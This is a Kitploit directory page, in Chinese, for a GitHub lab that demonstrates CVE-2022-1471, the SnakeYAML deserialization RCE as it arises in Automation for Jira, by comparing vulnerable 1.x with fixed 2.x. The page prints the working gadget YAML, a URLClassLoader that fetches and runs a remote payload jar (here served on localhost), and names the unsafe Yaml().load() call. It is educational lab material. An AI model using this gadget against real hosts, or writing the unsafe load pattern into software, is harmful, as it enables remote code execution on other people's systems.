Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2022-1471-jira-lab — 离线 CVE-2022-1471 实验环境:SnakeYAML 不安全反序列化导致 RCE;使用无害的本地 payload 对比存在漏洞的 1.x 版本与已修复的 2.x 版本。 | Kitploit
工具/GitHubGitHub/aykhan019/cve-2022-1471-jira-lab
漏洞分析漏洞利用学习与教育实验室与实践
GitHubaykhan019/cve-2022-1471-jira-lab

cve-2022-1471-jira-lab

离线 CVE-2022-1471 实验环境:SnakeYAML 不安全反序列化导致 RCE;使用无害的本地 payload 对比存在漏洞的 1.x 版本与已修复的 2.x 版本。

查看仓库
5天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-1471 — SnakeYAML RCE 实验环境(Jira / Automation for Jira 场景)

离线、自包含的实验环境,用于证明 CVE-2022-1471 背后的机制 (SnakeYAML 不安全反序列化 → RCE,CVSS 9.8),正如在 Jira / Jira Service Management 针对运行 9.4.9 的主机(受影响 范围 9.4.0–9.4.12,9.4.14 中修复 — 参见 Atlassian JSDSERVER-14906)的发现中所利用的那样。

该实验环境恰好演示两件事:

  1. SnakeYAML 1.31(Jira 9.4.9 在随附的 Automation 中自带的 1.x 系列 for Jira 应用)会在 YAML 解析期间 执行典型 gadget — 代码 运行,并写入一个标记文件。
  2. SnakeYAML 2.2(9.4.14+ 修复版所采用的系列)会拒绝相同的 payload(ConstructorException)— 不会运行任何内容。

它不会利用任何在线主机。所有内容都在 127.0.0.1 上运行; payload(src/Exploit.java)是无害的 — 它的静态初始化器只写入 一个文本文件,仅此而已。

运行

root@kitploit:~
./run.sh
cat PWNED-proof.txt   # on-disk proof of execution (regenerated each run)

需要 PATH 中包含 JDK 17+(javac、java、jar)。如果 tools/ 下存在 自带 JDK,则使用该 JDK。唯一的网络流量是 127.0.0.1:8077 上的本地 HTTP 服务器,用于提供 payload jar,退出时会被终止。

工作原理

src/VulnDemo.java 是一个裸的 new Yaml().load(yaml) — 与存在漏洞的 Automation for Jira 版本在导入规则 YAML 时进行的相同不安全调用。 攻击者 YAML 是典型的 gadget:

root@kitploit:~
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://127.0.0.1:8077/payload.jar"]
  ]]
]

SnakeYAML 1.x 在没有白名单的情况下实例化任意类 → JVM 会从“攻击者”服务器获取并加载一个类 → 其静态 初始化器执行。SnakeYAML 2.x 默认使用 SafeConstructor, 它会拒绝全局标签。

sample-output-PWNED-proof.txt 显示了一次运行中的标记文件内容;screenshots/ 显示了两次运行(存在漏洞 vs 已修复)的结果。

范围 / 免责声明

经授权的安全研究。仅证明库机制和修复 边界 — 不是针对任何生产系统的漏洞利用。利用 Jira 攻击向量还需要通过身份验证(Jira 管理员)导入 自动化规则。

参考

  • NVD — CVE-2022-1471
  • Atlassian 针对 CVE-2022-1471 的常见问题
  • Atlassian JSDSERVER-14906
  • SnakeYAML 问题 #561
下载工具